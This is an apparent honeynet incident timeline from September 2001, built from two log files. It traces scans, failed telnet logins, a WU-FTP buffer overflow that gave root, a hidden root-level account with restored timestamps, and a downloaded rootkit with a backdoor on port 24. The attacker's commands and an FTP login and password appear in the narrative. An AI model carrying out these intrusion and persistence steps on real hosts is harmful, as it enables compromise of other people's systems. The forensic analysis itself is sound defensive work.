Cells with white background are events captured in newdat3.log
Cells with Yellow background are events captured in slog2.log
Start Time | End Time | Detail of the event |
Sept-15 | ||
22:13:33 | 22:13:34 | Someone from the host 172.136.23.164 disconnect from a FTP session to the honeynet host. |
22:13:44 | 22:13:44 | Someone from the host 172.136.23.164 disconnect from a FTP session to the honeynet host. |
23:06:05 | 23:06:09 | Someone from the host 210.114.220.46 attempted (unsuccessfully) a rpc.statd buffer overflow attack on the honeynet host (192.168.1.102). |
23:06:09 | 23:06:09 | Syslogd on the honeynet host recorded a gethostbyname error on an incoming request. |
Sept-16 | ||
00:08:21 | 00:08:21 | Someone from the host 208.179.195.130 attempted a DNS zone transfer (TCP connection to port 53) to the honeynet host, but was rejected by the honeynet host (via a RST packet). |
03:03:00 | 03:03:00 | Someone terminated a TELNET connection to the honeynet host. |
03:03:22 | 03:03:22 | Someone terminated a TELNET connection to the honeynet host. |
03:34:42 | 03:34:45 | Someone from the host 138.86.152.104 attempted 3 NetBIOS name resolutions of the honeynet host, but the honeynet host responded to each request with a ICMP Port-Unreachable packet. |
03:36:25 | 03:46:04 | Someone from the host 128.175.106.247 launched a Gnutella connection to the honeynet host 5 times. |
12:41:33 | 12:41:34 | Someone from the host 24.248.173.56 attempted a DNS zone transfer (TCP connection to port 53) to the honeynet host, but was rejected by the honeynet host (via a RST packet). |
13:58:16 | 14:18:01 | Someone from the host 24.17.45.29 repeated 12 IPSec VPN connection attempts to the honeynet host, but the honeynet host responded to each request with a ICMP Port-Unreachable packet. |
13:58:43 | 13:58:43 | Someone from the host 207.50.37.225 attempted 5 NetBIOS name resolutions of the honeynet host, but the honeynet host responded to each request with a ICMP Port-Unreachable packet. |
14:17:29 | 14:18:46 | Someone from the host 63.168.30.92 attempted 5 NetBIOS name resolutions of the honeynet host, but the honeynet host responded to each request with a ICMP Port-Unreachable packet. |
16:24:22 | 16:24:37 | Someone from the host 206.75.218.84 established a telnet connection to the honeynet host and terminated the connection as soon as it's established. This could very well be a normal TCP port scan. |
16:24:36 | 16:24:36 | Someone terminated a TELNET connection to the honeynet host. |
19:38:38 | 19:38:38 | Anacron on the honeynet host has updated the timestamp for the job "cron.daily" to 2001-9-16. |
19:52:51 | 19:54:00 | Someone from the host 217.156.93.166 attempted unsuccessfully trying to telnet into the system by guessing the login and passwords of the user "nobody" and "uucp". This telnet session was eventually timed out after the cracker was not able to guess the right login and password within the default 60 seconds interval. Click here for the transcript of this event. |
19:53:05 | 19:53:07 | Syslogd on the honeynet host recorded a un-successful login attempt from 217.156.93.166 to the account "nobody". |
19:53:13 | 19:53:15 | Syslogd on the honeynet host recorded a un-successful login attempt from 217.156.93.166 to the account "nobody". |
19:54:00 | 19:54:00 | Syslogd on the honeynet host recorded the inetd daemon reseted itself. |
19:54:02 | 19:54:04 | Someone from the host 217.156.93.166 attempted 4 times trying to connect to TCP port 24 of the honeynet host, but the honeynet host rejected each of these requests with a RST packet. |
19:54:14 | 19:54:16 | Someone from the host 217.156.93.166 attempted 4 times trying to connect to TCP port 6666 of the honeynet host, but the honeynet host rejected each of these requests with a RST packet. |
19:55:45 | 20:56:15 | Someone from the host 207.35.251.172 established a FTP session to the honeynet host. She/he then gained root level access to the honeynet host by exploiting a buffer overflow vulnerability of the WU-FTP 2.6.0 FTP server. After some looking around, this cracker then nullify the passwd of the user "nobody", made backup of the timestamp on the /etc/passwd file and the /etc directory, nullify the passwd of the user "nobody" again, added a "root-equivalent" user "dns", nullify the passwd of the user "dns" and finally restored the timestamp of both the /etc/passwd file and the /etc directory to what was backed up earlier. This cracker eventually sign off this system after it verified the timestamps and the new passwd- file. The transcript of this event is quoted here. |
19:55:52 | 19:55:52 | Someone established a anonymous FTP session to the honeynet host from the host 207.35.251.172. |
20:01:26 | 20:01:26 | Anacron on the honeynet host has updated the timestamp for the job "cron.daily" to 2001-9-16. |
20:13:27 | 20:13:57 | Someone from the host 217.156.93.166 established a telnet session to the honeynet host using the login "nobody". She/he quickly signed off after merely executed the "w" command from the command prompt. |
20:13:35 | 20:13:35 | Someone signed onto the honeynet host as the user "nobody". |
20:13:50 | 20:13:50 | A user with UID=99 executed the command "w" from within the bourne shell. |
20:13:57 | 20:13:57 | The user "nobody" has signed itself off the honeynet host. |
20:22:13 | 20:22:13 | Someone created a new user "dns" with UID=0, GID=0, home=/bin & shell=/bin/bash on the honeynet host. |
20:32:10 | 20:55:01 | Someone from the host 217.156.93.166 established a telnet session to the honeynet host using the login "nobody". This cracker then invoked a FTP session to ftp.teleport.go.ro using the login "teleport" and the passwd "gunoierul", and downloaded "Zer0.tar.gz", "copy.tar.gz" and "ooty.tar.gz". After the files were downloaded, she/he run the "Go" script from the Zer0.tar.gz and then installed a rootkit on the honeynet host. The transcript of this event is quoted here. |
20:32:18 | 20:32:18 | Someone signed onto the honeynet host as the user "nobody" on the honeynet host. |
20:32:28 | 20:32:29 | The user "nobody" (UID=99) has SUed into the user "dns" on the honeynet host. |
20:32:34 | 20:32:34 | A user with UID=0 has executed the command "w" from within the bash shell on the honeynet host. |
20:32:48 | 20:32:48 | A user with UID=0 has executed the command "cd /tmp" from within the bash shell on the honeynet host. |
20:32:51 | 20:32:51 | A user with UID=0 has executed the command "mc -s" from within the bash shell on the honeynet host. |
20:33:06 | 20:33:06 | A user with UID=0 has executed the command "cd /dev/rd" from within the bash shell on the honeynet host. |
20:40:42 | 20:56:06 | FIN scan from 207.245.82.221 on port 64772 17 times |
20:41:05 | 20:41:05 | A user with UID=0 has executed the command "ftp teleport.go.ro" from within the bash shell on the honeynet host. |
20:41:21 | 20:41:21 | A user with UID=0 has executed the command "mkdir sdc0" from within the bash shell on the honeynet host. |
20:41:27 | 20:41:27 | A user with UID=0 has executed the command "cd sdc0" from within the bash shell on the honeynet host. |
20:41:29 | 20:41:29 | A user with UID=0 has executed the command "ls" from within the bash shell on the honeynet host. |
20:41:33 | 20:41:33 | A user with UID=0 has executed the command "ftp teleport.go.ro" from within the bash shell on the honeynet host. |
20:43:12 | 20:43:12 | A user with UID=0 has executed the command "tar zxvf Zer0.tar.gz" from within the bash shell on the honeynet host. |
20:43:21 | 20:43:21 | A user with UID=0 has executed the command "cd Zer0/" from within the bash shell on the honeynet host. |
20:43:23 | 20:43:23 | A user with UID=0 has executed the command "ls" from within the bash shell on the honeynet host. |
20:44:48 | 20:46:03 | Someone from 207.35.251.172 performed a SYN scan from port 1-10000 on the honeynet host. |
20:44:50 | 20:44:50 | Someone from 207.35.251.172 attempted to connect on the Syslog port of the Syslog server, but was rejected. |
20:44:50 | 20:44:50 | Someone from 207.35.251.172 attempted to connect to the RSH port of the honeynet host, but was rejected. |
20:44:54 | 20:44:54 | Someone terminated a TELNET connection to the honeynet host. |
20:45:13 | 20:45:13 | Someone terminated a FTP connection to the honeynet host. |
20:45:16 | 20:45:16 | Someone from 207.35.251.172 attempt to connect to the RLOGIN port of the honeynet host, but was rejected. |
20:46:03 | 20:46:03 | Syslogd on the honeynet host recorded a FINGER client hung up on its query, and advised it as possible port-scan. |
20:47:17 | 20:47:17 | A user with UID=0 has executed the command "./Go 24" from within the bash shell on the honeynet host. |
20:47:47 | 20:47:48 | The honeynet host delivered an email to hatcheryhatched@hotmail.com |
20:51:58 | 21:02:58 | Someone from the host 217.156.93.166 established a SSH1 session to port 24 of the honeynet host. |
20:52:18 | 20:52:18 | A user with UID=0 has executed the command "w" from within the bourne shell on the honeynet host. |
20:52:26 | 20:52:26 | A user with UID=0 has executed the command "whoami" from within the bourne shell on the honeynet host. |
20:54:55 | 20:54:55 | Someone has closed the SU session for the user "dns" on the honeynet host. |
20:55:00 | 20:55:00 | Someone has closed the login session for the user "nobody" on the honeynet host. |
20:55:06 | 20:55:06 | A user with UID=0 has executed the command "cd /dev/rd/sdc0" from within the bourne shell on the honeynet host. |
20:55:08 | 20:55:08 | A user with UID=0 has executed the command "ls" from within the bourne shell on honeynet host. |
20:55:18 | 20:55:18 | A user with UID=0 has executed the command "rm Zer0.tar.gz" from within the bourne shell on the honeynet host. |
20:55:21 | 20:55:21 | A user with UID=0 has executed the command "ls" from within the bourne shell on the honeynet host. |
20:55:54 | 20:55:54 | A user with UID=0 has executed the command "ls --color" from within the bourne shell on the honeynet host. |
20:55:56 | 20:55:56 | A user with UID=0 has executed the command "ls" from within the bourne shell on the honeynet host. |
20:58:23 | 20:58:23 | A user with UID=0 has executed the command "ls" from within the bourne shell on the honeynet host. |
20:58:23 | 20:58:40 | A user with UID=0 has executed the command "passwd nobody" from within the bourne shell on the honeynet host. |
21:00:02 | 21:00:02 | Someone has signed onto the honeynet host using the user "nobody". |
21:00:28 | 21:00:28 | Someone has signed onto the honeynet host using the user "uucp". |
21:01:22 | 21:01:29 | Someone from the honeynet host pinged the host 64.58.76.226 6 times |
21:01:22 | 21:01:22 | A user with UID=0 has executed the command "ping www.yahoo.com" from within the bourne shell on the honeynet host. |
21:02:02 | 21:02:02 | A user with UID=0 has executed the command "pico /etc/rc.d/rc3.d/S50inet" from the within the bourne shell on the honeynet host. |
21:02:18 | 21:02:18 | A user with UID=0 has executed the command "ls" from within the bourne shell on the honeynet host. |
21:02:42 | 21:02:42 | A user with UID=0 has executed the command "mv copy.tar.gz /usr/X11R6/bin/.,/copy" from within the bourne shell on the honeynet host. |
21:02:56 | 21:02:56 | A user with UID=0 has executed the command "cd /usr/X11R6/bin/.,/copy" from within the bourne shell on the honeynet host. |
21:03:07 | 21:03:07 | A user with UID=0 has executed the command "mv copy.tar.gz ../" from within the bourne shell on the honeynet host. |
21:03:09 | 21:03:09 | A user with UID=0 has executed the command "ls" from within the bourne shell on the honeynet host. |
21:03:14 | 21:03:14 | A user with UID=0 has executed the command "cd .." from within the bourne shell on the honeynet host. |
21:03:20 | 21:03:20 | A user with UID=0 has executed the command "tar zxvf copy.tar.gz" from within the bourne shell on the honeynet host. |
21:04:03 | 21:04:03 | A user with UID=0 has executed the command "chmod 7777 *" from within the bourne shell on the honeynet host. |
21:04:05 | 21:04:05 | A user with UID=0 has executed the command "ls" from within the bourne shell on the honeynet host. |
21:04:18 | 21:04:08 | A user with UID=0 has executed the command "rm copy.tar.gz" from within the bourne shell on the honeynet host. |
21:04:21 | 21:04:21 | A user with UID=0 has executed the command "cd copy" from within the bourne shell on the honeynet host. |
21:04:25 | 21:04:25 | A user with UID=0 has executed the command "chmod 7777 *" from within the bourne shell on the honeynet host. |
21:04:28 | 21:04:28 | A user with UID=0 has executed the command "ls" from within the bourne shell on the honeynet host. |
21:07:16 | 21:11:25 | Someone from the host 217.156.93.166 established a SSH1 session to port 24 of the honeynet host. |
21:07:33 | 21:07:33 | A user with UID=0 has executed the command "uname -r" from within the bourne shell of the honeynet host. |
21:07:58 | 21:07:58 | A user with UID=0 has executed the command "pstree" from within the bourne shell of the honeynet host. |
21:54:54 | 22:09:07 | FIN scan from 207.245.82.221 on port 64582 14 times |
21:54:55 | 22:08:41 | FIN scan from 207.245.82.221 on port 65433 13 times |